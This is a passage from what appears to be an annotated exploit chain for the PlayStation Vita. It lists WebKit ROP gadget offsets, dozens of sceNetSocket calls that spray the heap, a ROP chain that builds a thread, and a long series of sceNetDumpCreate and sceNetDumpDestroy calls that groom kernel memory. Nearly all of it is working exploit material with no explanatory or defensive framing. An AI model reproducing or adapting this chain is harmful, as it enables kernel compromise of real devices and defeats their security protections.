  420. 0x00003290-0x000032CC: [exploit + 0x00008474] = sceNetSocket(exploit + 0x00010390, 0x00000002, 0x00000001, 0x00000000)
  421.  
  422. 0x000032D0-0x0000330C: [exploit + 0x00008478] = sceNetSocket(exploit + 0x00010398, 0x00000002, 0x00000001, 0x00000000)
  423.  
  424. 0x00003310-0x0000334C: [exploit + 0x0000847C] = sceNetSocket(exploit + 0x000103A0, 0x00000002, 0x00000001, 0x00000000)
  425.  
  426. 0x00003350-0x0000338C: [exploit + 0x00008480] = sceNetSocket(exploit + 0x000103A8, 0x00000002, 0x00000001, 0x00000000)
  427.  
  428. 0x00003390-0x000033CC: [exploit + 0x00008484] = sceNetSocket(exploit + 0x000103B0, 0x00000002, 0x00000001, 0x00000000)
  429.  
  430. 0x000033D0-0x0000340C: [exploit + 0x00008488] = sceNetSocket(exploit + 0x000103B8, 0x00000002, 0x00000001, 0x00000000)
  431.  
  432. 0x00003410-0x0000344C: [exploit + 0x0000848C] = sceNetSocket(exploit + 0x000103C0, 0x00000002, 0x00000001, 0x00000000)
  433.  
  434. 0x00003450-0x0000348C: [exploit + 0x00008490] = sceNetSocket(exploit + 0x000103C8, 0x00000002, 0x00000001, 0x00000000)
  435.  
  436. 0x00003490-0x000034CC: [exploit + 0x00008494] = sceNetSocket(exploit + 0x000103D0, 0x00000002, 0x00000001, 0x00000000)
  437.  
  438. 0x000034D0-0x0000350C: [exploit + 0x00008498] = sceNetSocket(exploit + 0x000103D8, 0x00000002, 0x00000001, 0x00000000)
  439.  
  440. 0x00003510-0x0000354C: [exploit + 0x0000849C] = sceNetSocket(exploit + 0x000103E0, 0x00000002, 0x00000001, 0x00000000)
  441.  
  442. 0x00003550-0x0000358C: [exploit + 0x000084A0] = sceNetSocket(exploit + 0x000103E8, 0x00000002, 0x00000001, 0x00000000)
  443.  
  444. 0x00003590-0x000035CC: [exploit + 0x000084A4] = sceNetSocket(exploit + 0x000103F0, 0x00000002, 0x00000001, 0x00000000)
  445.  
  446. 0x000035D0-0x0000360C: [exploit + 0x000084A8] = sceNetSocket(exploit + 0x000103F8, 0x00000002, 0x00000001, 0x00000000)
  447.  
  448. 0x00003610-0x0000364C: [exploit + 0x000084AC] = sceNetSocket(exploit + 0x00010400, 0x00000002, 0x00000001, 0x00000000)
  449.  
  450. 0x00003650-0x0000368C: [exploit + 0x000084B0] = sceNetSocket(exploit + 0x00010408, 0x00000002, 0x00000001, 0x00000000)
  451.  
  452. 0x00003690-0x000036CC: [exploit + 0x000084B4] = sceNetSocket(exploit + 0x00010410, 0x00000002, 0x00000001, 0x00000000)
  453.  
  454. 0x000036D0-0x0000370C: [exploit + 0x000084B8] = sceNetSocket(exploit + 0x00010418, 0x00000002, 0x00000001, 0x00000000)
  455.  
  456. 0x00003710-0x0000374C: [exploit + 0x000084BC] = sceNetSocket(exploit + 0x00010420, 0x00000002, 0x00000001, 0x00000000)
  457.  
  458. 0x00003750-0x0000378C: [exploit + 0x000084C0] = sceNetSocket(exploit + 0x00010428, 0x00000002, 0x00000001, 0x00000000)
  459.  
  460. 0x00003790-0x000037CC: [exploit + 0x000084C4] = sceNetSocket(exploit + 0x00010430, 0x00000002, 0x00000001, 0x00000000)
  461.  
  462. 0x000037D0-0x0000380C: [exploit + 0x000084C8] = sceNetSocket(exploit + 0x00010438, 0x00000002, 0x00000001, 0x00000000)
  463.  
  464. 0x00003810-0x0000384C: [exploit + 0x000084CC] = sceNetSocket(exploit + 0x00010440, 0x00000002, 0x00000001, 0x00000000)
  465.  
  466. 0x00003850-0x0000388C: [exploit + 0x000084D0] = sceNetSocket(exploit + 0x00010448, 0x00000002, 0x00000001, 0x00000000)
  467.  
  468. 0x00003890-0x000038CC: [exploit + 0x000084D4] = sceNetSocket(exploit + 0x00010450, 0x00000002, 0x00000001, 0x00000000)
  469.  
  470. 0x000038D0-0x0000390C: [exploit + 0x000084D8] = sceNetSocket(exploit + 0x00010458, 0x00000002, 0x00000001, 0x00000000)
  471.  
  472. 0x00003910-0x0000394C: [exploit + 0x000084DC] = sceNetSocket(exploit + 0x00010460, 0x00000002, 0x00000001, 0x00000000)
  473.  
  474. 0x00003950-0x0000398C: [exploit + 0x000084E0] = sceNetSocket(exploit + 0x00010468, 0x00000002, 0x00000001, 0x00000000)
  475.  
  476. 0x00003990-0x000039CC: [exploit + 0x000084E4] = sceNetSocket(exploit + 0x00010470, 0x00000002, 0x00000001, 0x00000000)
  477.  
  478. 0x000039D0-0x00003A0C: [exploit + 0x000084E8] = sceNetSocket(exploit + 0x00010478, 0x00000002, 0x00000001, 0x00000000)
  479.  
  480. 0x00003A10-0x00003A4C: [exploit + 0x000084EC] = sceNetSocket(exploit + 0x00010480, 0x00000002, 0x00000001, 0x00000000)
  481.  
  482. 0x00003A50-0x00003A8C: [exploit + 0x000084F0] = sceNetSocket(exploit + 0x00010488, 0x00000002, 0x00000001, 0x00000000)
  483.  
  484. 0x00003A90-0x00003ACC: [exploit + 0x000084F4] = sceNetSocket(exploit + 0x00010490, 0x00000002, 0x00000001, 0x00000000)
  485.  
  486. 0x00003AD0-0x00003B0C: [exploit + 0x000084F8] = sceNetSocket(exploit + 0x00010498, 0x00000002, 0x00000001, 0x00000000)
  487.  
  488. 0x00003B10-0x00003B4C: [exploit + 0x000084FC] = sceNetSocket(exploit + 0x000104A0, 0x00000002, 0x00000001, 0x00000000)
  489.  
  490. 0x00003B50-0x00003B8C: [exploit + 0x00008500] = sceNetSocket(exploit + 0x000104A8, 0x00000002, 0x00000001, 0x00000000)
  491.  
  492. 0x00003B90-0x00003BCC: [exploit + 0x00008504] = sceNetSocket(exploit + 0x000104B0, 0x00000002, 0x00000001, 0x00000000)
  493.  
  494. 0x00003BD0-0x00003C0C: [exploit + 0x00008508] = sceNetSocket(exploit + 0x000104B8, 0x00000002, 0x00000001, 0x00000000)
  495.  
  496. 0x00003C10-0x00003C4C: [exploit + 0x0000850C] = sceNetSocket(exploit + 0x000104C0, 0x00000002, 0x00000001, 0x00000000)
  497.  
  498. 0x00003C50-0x00003C8C: [exploit + 0x00008510] = sceNetSocket(exploit + 0x000104C8, 0x00000002, 0x00000001, 0x00000000)
  499.  
  500. 0x00003C90-0x00003CCC: [exploit + 0x00008514] = sceNetSocket(exploit + 0x000104D0, 0x00000002, 0x00000001, 0x00000000)
  501.  
  502. 0x00003CD0-0x00003D0C: [exploit + 0x00008518] = sceNetSocket(exploit + 0x000104D8, 0x00000002, 0x00000001, 0x00000000)
  503.  
  504. 0x00003D10-0x00003D4C: [exploit + 0x0000851C] = sceNetSocket(exploit + 0x000104E0, 0x00000002, 0x00000001, 0x00000000)
  505.  
  506. 0x00003D50-0x00003D8C: [exploit + 0x00008520] = sceNetSocket(exploit + 0x000104E8, 0x00000002, 0x00000001, 0x00000000)
  507.  
  508. 0x00003D90-0x00003DCC: [exploit + 0x00008524] = sceNetSocket(exploit + 0x000104F0, 0x00000002, 0x00000001, 0x00000000)
  509.  
  510. 0x00003DD0-0x00003E0C: [exploit + 0x00008528] = sceNetSocket(exploit + 0x000104F8, 0x00000002, 0x00000001, 0x00000000)
  511.  
  512. 0x00003E10-0x00003E4C: [exploit + 0x0000852C] = sceNetSocket(exploit + 0x00010500, 0x00000002, 0x00000001, 0x00000000)
  513.  
  514. 0x00003E50-0x00003E8C: [exploit + 0x00008530] = sceNetSocket(exploit + 0x00010508, 0x00000002, 0x00000001, 0x00000000)
  515.  
  516. 0x00003E90-0x00003ECC: [exploit + 0x00008534] = sceNetSocket(exploit + 0x00010510, 0x00000002, 0x00000001, 0x00000000)
  517.  
  518. 0x00003ED0-0x00003F0C: [exploit + 0x00008538] = sceNetSocket(exploit + 0x00010518, 0x00000002, 0x00000001, 0x00000000)
  519.  
  520. 0x00003F10-0x00003F4C: [exploit + 0x0000853C] = sceNetSocket(exploit + 0x00010520, 0x00000002, 0x00000001, 0x00000000)
  521.  
  522. 0x00003F50-0x00003F8C: [exploit + 0x00008540] = sceNetSocket(exploit + 0x00010528, 0x00000002, 0x00000001, 0x00000000)
  523.  
  524. 0x00003F90-0x00003FCC: [exploit + 0x00008544] = sceNetSocket(exploit + 0x00010530, 0x00000002, 0x00000001, 0x00000000)
  525.  
  526. 0x00003FD0-0x0000400C: [exploit + 0x00008548] = sceNetSocket(exploit + 0x00010538, 0x00000002, 0x00000001, 0x00000000)
  527.  
  528. 0x00004010-0x0000404C: [exploit + 0x0000854C] = sceNetSocket(exploit + 0x00010540, 0x00000002, 0x00000001, 0x00000000)
  529.  
  530. 0x00004050-0x0000408C: [exploit + 0x00008550] = sceNetSocket(exploit + 0x00010548, 0x00000002, 0x00000001, 0x00000000)
  531.  
  532. 0x00004090-0x000040CC: [exploit + 0x00008554] = sceNetSocket(exploit + 0x00010550, 0x00000002, 0x00000001, 0x00000000)
  533.  
  534. 0x000040D0-0x0000410C: [exploit + 0x00008558] = sceNetSocket(exploit + 0x00010558, 0x00000002, 0x00000001, 0x00000000)
  535.  
  536. 0x00004110-0x0000414C: [exploit + 0x0000855C] = sceNetSocket(exploit + 0x00010560, 0x00000002, 0x00000001, 0x00000000)
  537.  
  538. 0x00004150-0x0000418C: [exploit + 0x00008560] = sceNetSocket(exploit + 0x00010568, 0x00000002, 0x00000001, 0x00000000)
  539.  
  540. 0x00004190-0x000041CC: [exploit + 0x00008564] = sceNetSocket(exploit + 0x00010570, 0x00000002, 0x00000001, 0x00000000)
  541.  
  542. 0x000041D0-0x0000420C: [exploit + 0x00008568] = sceNetSocket(exploit + 0x00010578, 0x00000002, 0x00000001, 0x00000000)
  543.  
  544. 0x00004210-0x0000424C: [exploit + 0x0000856C] = sceNetSocket(exploit + 0x00010580, 0x00000002, 0x00000001, 0x00000000)
  545.  
  546. 0x00004250-0x0000428C: [exploit + 0x00008570] = sceNetSocket(exploit + 0x00010588, 0x00000002, 0x00000001, 0x00000000)
  547.  
  548. 0x00004290-0x000042CC: [exploit + 0x00008574] = sceNetSocket(exploit + 0x00010590, 0x00000002, 0x00000001, 0x00000000)
  549.  
  550. 0x000042D0-0x0000430C: [exploit + 0x00008578] = sceNetSocket(exploit + 0x00010598, 0x00000002, 0x00000001, 0x00000000)
  551.  
  552. 0x00004310-0x0000434C: [exploit + 0x0000857C] = sceNetSocket(exploit + 0x000105A0, 0x00000002, 0x00000001, 0x00000000)
  553.  
  554. 0x00004350-0x0000438C: [exploit + 0x00008580] = sceNetSocket(exploit + 0x000105A8, 0x00000002, 0x00000001, 0x00000000)
  555.  
  556. 0x00004390-0x000043CC: [exploit + 0x00008584] = sceNetSocket(exploit + 0x000105B0, 0x00000002, 0x00000001, 0x00000000)
  557.  
  558. 0x000043D0-0x0000440C: [exploit + 0x00008588] = sceNetSocket(exploit + 0x000105B8, 0x00000002, 0x00000001, 0x00000000)
  559.  
  560. 0x00004410-0x0000444C: [exploit + 0x0000858C] = sceNetSocket(exploit + 0x000105C0, 0x00000002, 0x00000001, 0x00000000)
  561.  
  562. 0x00004450-0x0000448C: [exploit + 0x00008590] = sceNetSocket(exploit + 0x000105C8, 0x00000002, 0x00000001, 0x00000000)
  563.  
  564. 0x00004490-0x000044CC: [exploit + 0x00008594] = sceNetSocket(exploit + 0x000105D0, 0x00000002, 0x00000001, 0x00000000)
  565.  
  566. 0x000044D0-0x0000450C: [exploit + 0x00008598] = sceNetSocket(exploit + 0x000105D8, 0x00000002, 0x00000001, 0x00000000)
  567.  
  568. 0x00004510-0x0000454C: [exploit + 0x0000859C] = sceNetSocket(exploit + 0x000105E0, 0x00000002, 0x00000001, 0x00000000)
  569.  
  570. 0x00004550-0x0000458C: [exploit + 0x000085A0] = sceNetSocket(exploit + 0x000105E8, 0x00000002, 0x00000001, 0x00000000)
  571.  
  572. 0x00004590-0x000045CC: [exploit + 0x000085A4] = sceNetSocket(exploit + 0x000105F0, 0x00000002, 0x00000001, 0x00000000)
  573.  
  574. 0x000045D0-0x0000460C: [exploit + 0x000085A8] = sceNetSocket(exploit + 0x000105F8, 0x00000002, 0x00000001, 0x00000000)
  575.  
  576. 0x00004610-0x0000464C: [exploit + 0x000085AC] = sceNetSocket(exploit + 0x00010600, 0x00000002, 0x00000001, 0x00000000)
  577.  
  578. 0x00004650-0x0000468C: [exploit + 0x000085B8] = sceNetSocket(exploit + 0x00010608, 0x00000002, 0x00000001, 0x00000000)
  579.  
  580. 0x00004690-0x000046CC: [exploit + 0x000085C4] = sceNetSocket(exploit + 0x00010614, 0x00000002, 0x00000007, 0x00000000)
  581.  
  582. // Create mhm thread ROP:
  583. 0x000046D0-0x000046EC: [exploit + 0x00008708] = sceWebKit + 0x008DD9B5 <br>POP {R0-R5,PC}
  584. 0x000046F0-0x0000470C: [exploit + 0x0000870C] = [exploit + 0x000085C4]
  585. 0x00004710-0x0000472C: [exploit + 0x00008710] = 0x10007300
  586. 0x00004730-0x0000474C: [exploit + 0x00008714] = 0x00000000
  587. 0x00004750-0x0000476C: [exploit + 0x00008718] = 0x00000000
  588. 0x00004770-0x0000478C: [exploit + 0x0000871C] = sceLibNet + 0x00009F90 sceNetSyscallIoctl
  589. 0x00004790-0x000047AC: [exploit + 0x00008720] = 0x00000000
  590. 0x000047B0-0x000047CC: [exploit + 0x00008724] = sceWebKit + 0x000FCDBB <br>BLX R4<br>POP {R4,PC}
  591. 0x000047D0-0x000047EC: [exploit + 0x00008728] = exploit + 0x00008810
  592. 0x000047F0-0x0000480C: [exploit + 0x0000872C] = sceWebKit + 0x000059A9 STR R0, [R4] / POP {R4,PC}
  593. 0x00004810-0x0000482C: [exploit + 0x00008730] = 0x00000000
  594. 0x00004830-0x0000484C: [exploit + 0x00008734] = sceWebKit + 0x00000519 INFINE LOOP
  595.  
  596. 0x00004850-0x00004874: sceLibC_sub0x00013F01([exploit + 0x000086FC],exploit + 0x00008708,0x100);//memcpy(mhm thread stack, mhm thread rop,0x100);
  597.  
  598. //mhm thread args
  599. 0x00004878-0x00004894: [exploit + 0x00008830] = [exploit + 0x000086FC] < new SP
  600. 0x00004898-0x000048B4: [exploit + 0x00008834] = sceWebKit + 0x000C048B <br>POP {PC} < new PC
  601.  
  602. // Create Kernel Thread Object:
  603. 0x000048B8-0x000048F4: [exploit + 0x000085D0] = sceNetSocket(exploit + 0x00010620, 0x00000002, 0x00000001, 0x00000000)
  604. 0x000048F8-0x00004934: [exploit + 0x000085F4] = sceNetDumpCreate(exploit + 0x0001062C,0x00000F00,0x00000000)
  605.  
  606. 0x00004938-0x00004974: [exploit + 0x000085F8] = sceNetDumpCreate(exploit + 0x00010638,0x00000F00,0x00000000)
  607.  
  608. 0x00004978-0x000049B4: [exploit + 0x000085FC] = sceNetDumpCreate(exploit + 0x00010644,0x00000F00,0x00000000)
  609.  
  610. 0x000049B8-0x000049F4: [exploit + 0x00008600] = sceNetDumpCreate(exploit + 0x00010650,0x00000F00,0x00000000)
  611.  
  612. 0x000049F8-0x00004A34: [exploit + 0x00008604] = sceNetDumpCreate(exploit + 0x0001065C,0x00000F00,0x00000000)
  613.  
  614. 0x00004A38-0x00004A74: [exploit + 0x00008608] = sceNetDumpCreate(exploit + 0x00010668,0x00000F00,0x00000000)
  615.  
  616. 0x00004A78-0x00004AB4: [exploit + 0x0000860C] = sceNetDumpCreate(exploit + 0x00010674,0x00000F00,0x00000000)
  617.  
  618. 0x00004AB8-0x00004AF4: [exploit + 0x00008610] = sceNetDumpCreate(exploit + 0x00010680,0x00000F00,0x00000000)
  619.  
  620. 0x00004AF8-0x00004B34: [exploit + 0x00008614] = sceNetDumpCreate(exploit + 0x0001068C,0x00000F00,0x00000000)
  621.  
  622. 0x00004B38-0x00004B74: [exploit + 0x000085E8] = sceNetDumpCreate(exploit + 0x00010698,0x00000F00,0x00000000)
  623.  
  624. 0x00004B78-0x00004BB4: [exploit + 0x000085DC] = sceNetDumpCreate(exploit + 0x000106A4,0x00001000,0x00000000)
  625. 0x00004BB8-0x00004BD4: sceNetDumpDestroy([exploit + 0x000085F4])
  626.  
  627. 0x00004BD8-0x00004BF4: sceNetDumpDestroy([exploit + 0x000085FC])
  628.  
  629. 0x00004BF8-0x00004C14: sceNetDumpDestroy([exploit + 0x00008604])
  630.  
  631. 0x00004C18-0x00004C34: sceNetDumpDestroy([exploit + 0x0000860C])
  632.  
  633. 0x00004C38-0x00004C54: sceNetDumpDestroy([exploit + 0x00008614])
  634.  
  635. 0x00004C58-0x00004C74: sceNetDumpDestroy([exploit + 0x000085E8])
  636. 0x00004C78-0x00004C9C: sceNetDumpCreate(exploit + 0x000106B0,0x000D0000,0x00000000)\* r0 - lost *\
  637.  
  638. 0x00004CA0-0x00004CC4: sceNetDumpCreate(exploit + 0x000106BC,0x000CFF00,0x00000000)\* r0 - lost *\
  639.  
  640. 0x00004CC8-0x00004CEC: sceNetDumpCreate(exploit + 0x000106C8,0x000CFE00,0x00000000)\* r0 - lost *\
  641.  
  642. 0x00004CF0-0x00004D14: sceNetDumpCreate(exploit + 0x000106D4,0x000CFD00,0x00000000)\* r0 - lost *\
  643.  
  644. 0x00004D18-0x00004D3C: sceNetDumpCreate(exploit + 0x000106E0,0x000CFC00,0x00000000)\* r0 - lost *\
  645.  
  646. 0x00004D40-0x00004D64: sceNetDumpCreate(exploit + 0x000106EC,0x000CFB00,0x00000000)\* r0 - lost *\
  647.  
  648. 0x00004D68-0x00004D8C: sceNetDumpCreate(exploit + 0x000106F8,0x000CFA00,0x00000000)\* r0 - lost *\
  649.  
  650. 0x00004D90-0x00004DB4: sceNetDumpCreate(exploit + 0x00010704,0x000CF900,0x00000000)\* r0 - lost *\
  651.  
  652. 0x00004DB8-0x00004DDC: sceNetDumpCreate(exploit + 0x00010710,0x000CF800,0x00000000)\* r0 - lost *\
  653.  
  654. 0x00004DE0-0x00004E04: sceNetDumpCreate(exploit + 0x0001071C,0x000CF700,0x00000000)\* r0 - lost *\
  655.  
  656. 0x00004E08-0x00004E2C: sceNetDumpCreate(exploit + 0x00010728,0x000CF600,0x00000000)\* r0 - lost *\
  657.  
  658. 0x00004E30-0x00004E54: sceNetDumpCreate(exploit + 0x00010734,0x000CF500,0x00000000)\* r0 - lost *\
  659.  
  660. 0x00004E58-0x00004E7C: sceNetDumpCreate(exploit + 0x00010740,0x000CF400,0x00000000)\* r0 - lost *\
  661.  
  662. 0x00004E80-0x00004EA4: sceNetDumpCreate(exploit + 0x0001074C,0x000CF300,0x00000000)\* r0 - lost *\
  663.  
  664. 0x00004EA8-0x00004ECC: sceNetDumpCreate(exploit + 0x00010758,0x000CF200,0x00000000)\* r0 - lost *\
  665.  
  666. 0x00004ED0-0x00004EF4: sceNetDumpCreate(exploit + 0x00010764,0x000CF100,0x00000000)\* r0 - lost *\
  667.  
  668. 0x00004EF8-0x00004F1C: sceNetDumpCreate(exploit + 0x00010770,0x000CF000,0x00000000)\* r0 - lost *\
  669.  
  670. 0x00004F20-0x00004F44: sceNetDumpCreate(exploit + 0x0001077C,0x000CEF00,0x00000000)\* r0 - lost *\
  671.  
  672. 0x00004F48-0x00004F6C: sceNetDumpCreate(exploit + 0x00010788,0x000CEE00,0x00000000)\* r0 - lost *\
  673.  
  674. 0x00004F70-0x00004F94: sceNetDumpCreate(exploit + 0x00010794,0x000CED00,0x00000000)\* r0 - lost *\
  675.  
  676. 0x00004F98-0x00004FBC: sceNetDumpCreate(exploit + 0x000107A0,0x000CEC00,0x00000000)\* r0 - lost *\
  677.  
  678. 0x00004FC0-0x00004FE4: sceNetDumpCreate(exploit + 0x000107AC,0x000CEB00,0x00000000)\* r0 - lost *\
  679.  
  680. 0x00004FE8-0x0000500C: sceNetDumpCreate(exploit + 0x000107B8,0x000CEA00,0x00000000)\* r0 - lost *\
  681.  
  682. 0x00005010-0x00005034: sceNetDumpCreate(exploit + 0x000107C4,0x000CE900,0x00000000)\* r0 - lost *\
  683.  
  684. 0x00005038-0x0000505C: sceNetDumpCreate(exploit + 0x000107D0,0x000CE800,0x00000000)\* r0 - lost *\
  685.  
  686. 0x00005060-0x00005084: sceNetDumpCreate(exploit + 0x000107DC,0x000CE700,0x00000000)\* r0 - lost *\
  687.  
  688. 0x00005088-0x000050AC: sceNetDumpCreate(exploit + 0x000107E8,0x000CE600,0x00000000)\* r0 - lost *\
  689.  
  690. 0x000050B0-0x000050D4: sceNetDumpCreate(exploit + 0x000107F4,0x000CE500,0x00000000)\* r0 - lost *\
  691.  
  692. 0x000050D8-0x000050FC: sceNetDumpCreate(exploit + 0x00010800,0x000CE400,0x00000000)\* r0 - lost *\
  693.  
  694. 0x00005100-0x00005124: sceNetDumpCreate(exploit + 0x0001080C,0x000CE300,0x00000000)\* r0 - lost *\
  695.  
  696. 0x00005128-0x0000514C: sceNetDumpCreate(exploit + 0x00010818,0x000CE200,0x00000000)\* r0 - lost *\
  697.  
  698. 0x00005150-0x00005174: sceNetDumpCreate(exploit + 0x00010824,0x000CE100,0x00000000)\* r0 - lost *\
  699.  
  700. 0x00005178-0x0000519C: sceNetDumpCreate(exploit + 0x00010830,0x000CE000,0x00000000)\* r0 - lost *\
  701.  
  702. 0x000051A0-0x000051C4: sceNetDumpCreate(exploit + 0x0001083C,0x000CDF00,0x00000000)\* r0 - lost *\
  703.  
  704. 0x000051C8-0x000051EC: sceNetDumpCreate(exploit + 0x00010848,0x000CDE00,0x00000000)\* r0 - lost *\
  705.  
  706. 0x000051F0-0x00005214: sceNetDumpCreate(exploit + 0x00010854,0x000CDD00,0x00000000)\* r0 - lost *\
  707.  
  708. 0x00005218-0x0000523C: sceNetDumpCreate(exploit + 0x00010860,0x000CDC00,0x00000000)\* r0 - lost *\
  709.  
  710. 0x00005240-0x00005264: sceNetDumpCreate(exploit + 0x0001086C,0x000CDB00,0x00000000)\* r0 - lost *\
  711.  
  712. 0x00005268-0x0000528C: sceNetDumpCreate(exploit + 0x00010878,0x000CDA00,0x00000000)\* r0 - lost *\
  713.  
  714. 0x00005290-0x000052B4: sceNetDumpCreate(exploit + 0x00010884,0x000CD900,0x00000000)\* r0 - lost *\
  715.  
  716. 0x000052B8-0x000052DC: sceNetDumpCreate(exploit + 0x00010890,0x000CD800,0x00000000)\* r0 - lost *\
  717.  
  718. 0x000052E0-0x00005304: sceNetDumpCreate(exploit + 0x0001089C,0x000CD700,0x00000000)\* r0 - lost *\
  719.  
  720. 0x00005308-0x0000532C: sceNetDumpCreate(exploit + 0x000108A8,0x000CD600,0x00000000)\* r0 - lost *\
  721.  
  722. 0x00005330-0x00005354: sceNetDumpCreate(exploit + 0x000108B4,0x000CD500,0x00000000)\* r0 - lost *\
  723.  
  724. 0x00005358-0x0000537C: sceNetDumpCreate(exploit + 0x000108C0,0x000CD400,0x00000000)\* r0 - lost *\
  725.  
  726. 0x00005380-0x000053A4: sceNetDumpCreate(exploit + 0x000108CC,0x000CD300,0x00000000)\* r0 - lost *\
  727.  
  728. 0x000053A8-0x000053CC: sceNetDumpCreate(exploit + 0x000108D8,0x000CD200,0x00000000)\* r0 - lost *\
  729.  
  730. 0x000053D0-0x000053F4: sceNetDumpCreate(exploit + 0x000108E4,0x000CD100,0x00000000)\* r0 - lost *\
  731.  
  732. 0x000053F8-0x0000541C: sceNetDumpCreate(exploit + 0x000108F0,0x000CD000,0x00000000)\* r0 - lost *\
  733.  
  734. 0x00005420-0x00005444: sceNetDumpCreate(exploit + 0x000108FC,0x000CCF00,0x00000000)\* r0 - lost *\
  735.  
  736. 0x00005448-0x0000546C: sceNetDumpCreate(exploit + 0x00010908,0x000CCE00,0x00000000)\* r0 - lost *\
  737.  
  738. 0x00005470-0x00005494: sceNetDumpCreate(exploit + 0x00010914,0x000CCD00,0x00000000)\* r0 - lost *\
  739.  
  740. 0x00005498-0x000054BC: sceNetDumpCreate(exploit + 0x00010920,0x000CCC00,0x00000000)\* r0 - lost *\
  741.  
  742. 0x000054C0-0x000054E4: sceNetDumpCreate(exploit + 0x0001092C,0x000CCB00,0x00000000)\* r0 - lost *\
  743.  
  744. 0x000054E8-0x0000550C: sceNetDumpCreate(exploit + 0x00010938,0x000CCA00,0x00000000)\* r0 - lost *\
  745.  
  746. 0x00005510-0x00005534: sceNetDumpCreate(exploit + 0x00010944,0x000CC900,0x00000000)\* r0 - lost *\
  747.  
  748. 0x00005538-0x0000555C: sceNetDumpCreate(exploit + 0x00010950,0x000CC800,0x00000000)\* r0 - lost *\
  749.  
  750. 0x00005560-0x00005584: sceNetDumpCreate(exploit + 0x0001095C,0x000CC700,0x00000000)\* r0 - lost *\
  751.  
  752. 0x00005588-0x000055AC: sceNetDumpCreate(exploit + 0x00010968,0x000CC600,0x00000000)\* r0 - lost *\
  753.  
  754. 0x000055B0-0x000055D4: sceNetDumpCreate(exploit + 0x00010974,0x000CC500,0x00000000)\* r0 - lost *\
  755.  
  756. 0x000055D8-0x000055FC: sceNetDumpCreate(exploit + 0x00010980,0x000CC400,0x00000000)\* r0 - lost *\
  757.  
  758. 0x00005600-0x00005624: sceNetDumpCreate(exploit + 0x0001098C,0x000CC300,0x00000000)\* r0 - lost *\
  759.  
  760. 0x00005628-0x0000564C: sceNetDumpCreate(exploit + 0x00010998,0x000CC200,0x00000000)\* r0 - lost *\
  761.  
  762. 0x00005650-0x00005674: sceNetDumpCreate(exploit + 0x000109A4,0x000CC100,0x00000000)\* r0 - lost *\
  763.  
  764. 0x00005678-0x0000569C: sceNetDumpCreate(exploit + 0x000109B0,0x000CC000,0x00000000)\* r0 - lost *\
  765.  
  766. 0x000056A0-0x000056C4: sceNetDumpCreate(exploit + 0x000109BC,0x000CBF00,0x00000000)\* r0 - lost *\
  767.  
  768. 0x000056C8-0x000056EC: sceNetDumpCreate(exploit + 0x000109C8,0x000CBE00,0x00000000)\* r0 - lost *\
  769.  
  770. 0x000056F0-0x00005714: sceNetDumpCreate(exploit + 0x000109D4,0x000CBD00,0x00000000)\* r0 - lost *\
  771.  
  772. 0x00005718-0x0000573C: sceNetDumpCreate(exploit + 0x000109E0,0x000CBC00,0x00000000)\* r0 - lost *\
  773.  
  774. 0x00005740-0x00005764: sceNetDumpCreate(exploit + 0x000109EC,0x000CBB00,0x00000000)\* r0 - lost *\
  775.  
  776. 0x00005768-0x0000578C: sceNetDumpCreate(exploit + 0x000109F8,0x000CBA00,0x00000000)\* r0 - lost *\
  777.  
  778. 0x00005790-0x000057B4: sceNetDumpCreate(exploit + 0x00010A04,0x000CB900,0x00000000)\* r0 - lost *\
  779.  
  780. 0x000057B8-0x000057DC: sceNetDumpCreate(exploit + 0x00010A10,0x000CB800,0x00000000)\* r0 - lost *\
  781.  
  782. 0x000057E0-0x00005804: sceNetDumpCreate(exploit + 0x00010A1C,0x000CB700,0x00000000)\* r0 - lost *\
  783.  
  784. 0x00005808-0x0000582C: sceNetDumpCreate(exploit + 0x00010A28,0x000CB600,0x00000000)\* r0 - lost *\
  785.  
  786. 0x00005830-0x00005854: sceNetDumpCreate(exploit + 0x00010A34,0x000CB500,0x00000000)\* r0 - lost *\
  787.  
  788. 0x00005858-0x0000587C: sceNetDumpCreate(exploit + 0x00010A40,0x000CB400,0x00000000)\* r0 - lost *\
  789.  
  790. 0x00005880-0x000058A4: sceNetDumpCreate(exploit + 0x00010A4C,0x000CB300,0x00000000)\* r0 - lost *\
  791.  
  792. 0x000058A8-0x000058CC: sceNetDumpCreate(exploit + 0x00010A58,0x000CB200,0x00000000)\* r0 - lost *\
  793.  
  794. 0x000058D0-0x000058F4: sceNetDumpCreate(exploit + 0x00010A64,0x000CB100,0x00000000)\* r0 - lost *\
  795.  
  796. 0x000058F8-0x0000591C: sceNetDumpCreate(exploit + 0x00010A70,0x000CB000,0x00000000)\* r0 - lost *\
  797.  
  798. 0x00005920-0x00005944: sceNetDumpCreate(exploit + 0x00010A7C,0x000CAF00,0x00000000)\* r0 - lost *\
  799.  
  800. 0x00005948-0x0000596C: sceNetDumpCreate(exploit + 0x00010A88,0x000CAE00,0x00000000)\* r0 - lost *\
  801.  
  802. 0x00005970-0x00005994: sceNetDumpCreate(exploit + 0x00010A94,0x000CAD00,0x00000000)\* r0 - lost *\
  803.  
  804. 0x00005998-0x000059BC: sceNetDumpCreate(exploit + 0x00010AA0,0x000CAC00,0x00000000)\* r0 - lost *\
  805.  
  806. 0x000059C0-0x000059E4: sceNetDumpCreate(exploit + 0x00010AAC,0x000CAB00,0x00000000)\* r0 - lost *\
  807.  
  808. 0x000059E8-0x00005A0C: sceNetDumpCreate(exploit + 0x00010AB8,0x000CAA00,0x00000000)\* r0 - lost *\
  809.  
  810. 0x00005A10-0x00005A34: sceNetDumpCreate(exploit + 0x00010AC4,0x000CA900,0x00000000)\* r0 - lost *\
  811.  
  812. 0x00005A38-0x00005A5C: sceNetDumpCreate(exploit + 0x00010AD0,0x000CA800,0x00000000)\* r0 - lost *\
  813.  
  814. 0x00005A60-0x00005A84: sceNetDumpCreate(exploit + 0x00010ADC,0x000CA700,0x00000000)\* r0 - lost *\
  815.  
  816. 0x00005A88-0x00005AAC: sceNetDumpCreate(exploit + 0x00010AE8,0x000CA600,0x00000000)\* r0 - lost *\
  817.  
  818. 0x00005AB0-0x00005AD4: sceNetDumpCreate(exploit + 0x00010AF4,0x000CA500,0x00000000)\* r0 - lost *\
  819.  
  820. 0x00005AD8-0x00005AFC: sceNetDumpCreate(exploit + 0x00010B00,0x000CA400,0x00000000)\* r0 - lost *\
  821.  
  822. 0x00005B00-0x00005B24: sceNetDumpCreate(exploit + 0x00010B0C,0x000CA300,0x00000000)\* r0 - lost *\
  823.  
  824. 0x00005B28-0x00005B4C: sceNetDumpCreate(exploit + 0x00010B18,0x000CA200,0x00000000)\* r0 - lost *\
  825.  
  826. 0x00005B50-0x00005B74: sceNetDumpCreate(exploit + 0x00010B24,0x000CA100,0x00000000)\* r0 - lost *\
